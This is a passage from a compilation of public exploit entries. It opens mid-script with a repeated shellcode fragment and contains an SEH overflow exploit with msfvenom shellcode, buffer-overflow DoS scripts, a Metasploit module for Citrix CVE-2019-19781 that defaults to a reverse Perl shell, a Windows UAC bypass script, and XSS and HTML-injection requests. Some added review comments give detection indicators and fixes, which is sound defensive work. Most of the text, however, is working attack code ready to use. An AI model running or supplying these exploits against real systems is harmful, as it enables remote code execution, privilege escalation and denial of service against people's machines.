b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += 
"\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x59\x78\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()
-
Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.alloksoft.com # Software Link: https://www.alloksoft.com/allok_rmconverter.exe # Version: 3.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc_seh.txt into the License Name input field # of Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe. #!/usr/bin/python nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += 
b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += "\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x11\x7b\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()
-
Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.top-password.com/ # Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe # Version: 2.8 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the # User Name / Registration Code input fields. #!/usr/bin/python poc = "A"*5000 file = open("poc.txt","w") file.write(poc) file.close()
-
TaskCanvas 1.4.0 - 'Registration' Denial Of Service
# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : https://www.digitalvolcano.co.uk/ # Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install TaskCanvas 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Registration -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Registration' and click on 'Ok' 6.TaskCanvas Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
-
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)
# NOTE(review): `check` rescues connection errors but then leaves `received` nil, and the
# `received && received.code != 200` guard evaluates false for nil, so the method falls
# through to Exploit::CheckCode::Vulnerable -- an unreachable host or a nil (timed-out)
# response is reported as vulnerable. A nil response should map to
# Exploit::CheckCode::Unknown instead.
# Detection notes, taken from the requests this module sends: a POST whose path contains
# "/vpn/../vpns/portal/scripts/newbm.pl" carrying an NSC_USER header that traverses into
# netscaler/portal/templates/, followed by a GET for "/vpn/../vpns/portal/<16 random
# letters>.xml"; the generated template file is the on-disk artifact the module declares
# with ARTIFACTS_ON_DISK, and the traversal paths are the IOC_IN_LOGS it declares.
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix ADC Remote Code Execution', 'Description' => %q( An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. ), 'Author' => [ 'RAMELLA Sébastien' # https://www.pirates.re/ ], 'References' => [ ['CVE', '2019-19781'], ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], ['EDB', '47901'], ['EDB', '47902'] ], 'DisclosureDate' => '2019-12-17', 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl meterpreter' } }, 'Targets' => [ ['Unix (remote shell)', 'Type' => :cmd_shell, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'DisablePayloadHandler' => 'false' } ], ['Unix (command-line)', 'Type' => :cmd_generic, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic', 'DisablePayloadHandler' => 'true' } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptAddress.new('RHOST', [true, 'The target address']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]) ]) deregister_options('RHOSTS') end def execute_command(command, opts = {}) filename = Rex::Text.rand_text_alpha(16) nonce = Rex::Text.rand_text_alpha(6) request = { 'method' => 'POST', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), 'headers' => { 'NSC_USER' => 
'../../../netscaler/portal/templates/' + filename, 'NSC_NONCE' => nonce }, 'vars_post' => { 'url' => 'http://127.0.0.1', 'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]", 'desc' => 'desc', 'UI_inuse' => 'RfWeb' }, 'encode_params' => false } begin received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received if received.code == 200 vprint_status("#{received.get_html_document.text}") sleep 2 request = { 'method' => 'GET', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), 'headers' => { 'NSC_USER' => nonce, 'NSC_NONCE' => nonce } } ## Trigger to gain exploitation. begin send_request_cgi(request) received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received return received end return false end def get_chr_payload(command) chr_payload = command i = chr_payload.length output = "" chr_payload.each_char do | c | i = i - 1 output << "chr(" << c.ord.to_s << ")" if i != 0 output << " . " end end return output end def check begin received = send_request_cgi( "method" => "GET", "uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') ) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end if received && received.code != 200 return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit unless check.eql? 
Exploit::CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'The target is not exploitable.') end else print_good('The target appears to be vulnerable.') end case target['Type'] when :cmd_generic print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") received = execute_command(payload.encoded) if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic") print_warning('Dumping command output in parsed http response') print_good("#{received.get_html_document.text}") else print_warning('Empty response, no command output') return end when :cmd_shell print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") execute_command(payload.encoded) end end end
-
Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)
# NOTE(review): the host-side indicator for this technique is the creation of the per-user key
# HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command (an empty DelegateExecute
# value plus a default value holding the command) shortly before changepk.exe starts;
# monitoring that key and removing it (the `reg delete` in the final comment below) is the
# cleanup and mitigation the author relies on.
# NOTE(review): each `except WindowsError: raise` handler is a no-op (it re-raises without
# adding context), and `current_dir` in bypass_uac() is computed but never used.
# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass) # Author: Nassim Asrir # Date: 2019-01-10 # Exploit Author: Nassim Asrir # CVE: N/A # Tested On: Windows 10Pro 1809 # Vendor : https://www.microsoft.com # Technical Details # I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process. # The executable is changepk.exe. changepk is used to pass a new product key, you can pass the key also via commandline. # By executing changepk.exe and tracing the process we can see some RegOpenKey operations that lead to open some non-found Key in the registry (HKCU). # In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC. # ntoskrnl.exe ObOpenObjectByNameEx + 0x32db 0xfffff8073106270b C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe RtlMapGenericMask + 0x2548 0xfffff80731090118 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe ObOpenObjectByNameEx + 0x1bd9 0xfffff80731061009 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe ObOpenObjectByNameEx + 0x1df 0xfffff8073105f60f C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe SeCaptureSubjectContextEx + 0x7c8 0xfffff8073105dc98 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe SeCaptureSubjectContextEx + 0x51f 0xfffff8073105d9ef C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe setjmpex + 0x78e5 0xfffff80730bd9c05 C:\WINDOWS\system32\ntoskrnl.exe # ntdll.dll ZwOpenKeyEx + 0x14 0x7ff877501a94 C:\Windows\System32\ntdll.dll # KernelBase.dll RegEnumKeyExW + 0x4c5 0x7ff874161655 C:\Windows\System32\KernelBase.dll # KernelBase.dll MapPredefinedHandleInternal + 0xca5 0x7ff874162fb5 C:\Windows\System32\KernelBase.dll # KernelBase.dll RegOpenKeyExInternalW + 0x141 0x7ff874161fa1 C:\Windows\System32\KernelBase.dll # KernelBase.dll RegOpenKeyExW + 0x19 0x7ff874161e49 C:\Windows\System32\KernelBase.dll # SHCore.dll SHGetValueW + 0x8c 0x7ff87469bfcc C:\Windows\System32\SHCore.dll # shell32.dll 
Ordinal790 + 0xb282 0x7ff87532fd22 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xad56 0x7ff87532f7f6 C:\Windows\System32\shell32.dll # shell32.dll SHChangeNotification_Lock + 0x2b8 0x7ff8753a2a58 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xb0cb 0x7ff87532fb6b C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xa254 0x7ff87532ecf4 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xa7c6 0x7ff87532f266 C:\Windows\System32\shell32.dll # shell32.dll Shell_NotifyIconW + 0x1695 0x7ff875349c75 C:\Windows\System32\shell32.dll # shell32.dll SHGetFileInfoW + 0x18a5 0x7ff87536a8c5 C:\Windows\System32\shell32.dll # shell32.dll SignalFileOpen + 0x33b 0x7ff8753a140b C:\Windows\System32\shell32.dll # shell32.dll SignalFileOpen + 0x25b 0x7ff8753a132b C:\Windows\System32\shell32.dll # shell32.dll Ordinal99 + 0x9c6 0x7ff87534ff96 C:\Windows\System32\shell32.dll # shell32.dll SHGetSpecialFolderLocation + 0x28e 0x7ff8753bac5e C:\Windows\System32\shell32.dll # SHCore.dll Ordinal233 + 0x3c5 0x7ff8746ac315 C:\Windows\System32\SHCore.dll # kernel32.dll BaseThreadInitThunk + 0x14 0x7ff875087974 C:\Windows\System32\kernel32.dll # ntdll.dll RtlUserThreadStart + 0x21 0x7ff8774ca271 C:\Windows\System32\ntdll.dll # Exploit # To exploit the vulnerability you can use this python code then execute it and you will get the Windows Activation just click Yes and you will redirect the execution to cmd.exe. # -*- coding: utf-8 -*- import os import sys import ctypes import _winreg import time print "Creating Registry Key ....." 
print "" time.sleep(3) def create_reg_key(key, value): try: _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command') registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise print "Registry Key Created :)" print "" print "Inserting the command ...." time.sleep(3) print "" def exec_bypass_uac(cmd): try: create_reg_key('DelegateExecute', '') create_reg_key(None, cmd) except WindowsError: raise def bypass_uac(): try: current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__ cmd = "C:\windows\System32\cmd.exe" exec_bypass_uac(cmd) os.system(r'C:\windows\system32\changepk.exe') return 1 except WindowsError: sys.exit(1) if __name__ == '__main__': if bypass_uac(): print "Good job you got your Administrator cmd :)" # Don't Fogot: reg delete "HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" /f
-
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting # Date: 2019-11-10 # Exploit Author: Raspina Net Pars Group # Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb # Version: 1.93.21.19 # CVE : CVE-2019-18859 # PoC GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 # Author Website: HTTPS://RNPG.info
-
VPN unlimited 6.1 - Unquoted Service Path
# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path # Date: 2020-1-13 # Exploit Author: Amin Rawah # Vendor Homepage: https://www.vpnunlimitedapp.com # Version: 6.1 # Tested on: Windows 10 64bit C:\Users\Amin>sc qc VPNUnlimitedService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VPNUnlimitedService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VPN Unlimited Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
-
IBM RICOH 6400 Printer - HTML Injection
# Exploit Title: IBM RICOH 6400 Printer - HTML Injection # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=649/ENUSA02-1405&appname=USN # Firmware Version: 1.1.26.3 # Vulnerability Type: Code Injection # Vulnerability: HTML Injection # CVE: N/A # Description : # Ricoh InfoPrint 6400 devices allow /config?logpathConf.html # HTML Injection by authenticated users, as demonstrated by the 420 parameter. HTTP Request : POST /config?logpathConf.html HTTP/1.1 Host: SERVER User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 54 Origin: SERVER Authorization: Basic cm9vdDpyb290 Connection: close Referer: http://SERVER/config?logpathConf.html Upgrade-Insecure-Requests: 1 428=&420=%22%3E%3Cmarquee%3EIsmail+Tasdelen&548=5&564= HTTP Response : HTTP/1.0 200 OK Server: Microplex emHTTPD/1.0 Content-Type: text/html
-
IBM RICOH InfoPrint 6500 Printer - HTML Injection
# Exploit Title: IBM RICOH InfoPrint 6500 Printer - HTML Injection # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: http://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-214 # Firmware Version: 1.4.40.10 # Vulnerability Type: Code Injection # Vulnerability: HTML Injection # CVE: N/A # Description : # Ricoh InfoPrint 6500 devices allow /config?destConf.html # HTML Injection by authenticated users, as demonstrated by the 166 parameter. HTTP Request : POST /config?destConf.html HTTP/1.1 Host: SERVER User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: SERVER Authorization: Basic cm9vdDpyb290 Connection: close Referer: http://SERVER/config?destConf.html Upgrade-Insecure-Requests: 1 166=%22%3E%3Ch1%3EIsmail+Tasdelen&182=1&230=1&198=1&190=1&222=1&238=1&270=0&486=0 HTTP Response : HTTP/1.0 200 OK Server: Microplex emHTTPD/1.0 Content-Type: text/html
-
Redir 3.3 - Denial of Service (PoC)
# Exploit Title: Redir 3.3 - Denial of Service (PoC) # Date: 2020-01-14 # Exploit Author: hieubl from HPT Cyber Security # Vendor Homepage: https://github.com/troglobit/redir # Software Link: https://github.com/troglobit/redir # Version: 3.3 # Tested on: Kali GNU/Linux Rolling 2019.4 # CVE : [if applicable] The source code of redir.c contains the doproxyconnect() function, which has a stack-based buffer overflow: sprintf() formats the user-controlled connect_str (supplied through -x in the PoC below) into the 128-byte local buf with no length bound, so an over-long value runs past buf and overwrites the saved return address; a bounded snprintf() is the fix: void doproxyconnect(int socket) { int x; char buf[128]; /* write CONNECT string to proxy */ sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str); x = write(socket, (char *)&buf, strlen(buf)); if (x < 1) { syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno)); exit(1); } /* now read result */ x = read(socket, (char *)&buf, sizeof(buf)); if (x < 1) { syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno)); exit(1); } /* no more error checking for now -- something should be added later */ /* HTTP/1.0 200 Connection established */ } Download and build: # git clone https://github.com/troglobit/redir.git # cd redir # ./autogen.sh # ./configure # make Proof of Concept: In 1st terminal: # gdb -q ./redir # set follow-fork-mode child # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :1234 hpt.vn:80 In 2nd terminal: # nc localhost 1234 After that, the program in 1st terminal will crash because of buffer overflow vulnerability. ... ► 0x5555555571b0 <doproxyconnect+144> ret <0x4141414141414141> ... Program received signal SIGSEGV (fault address 0x0) pwndbg>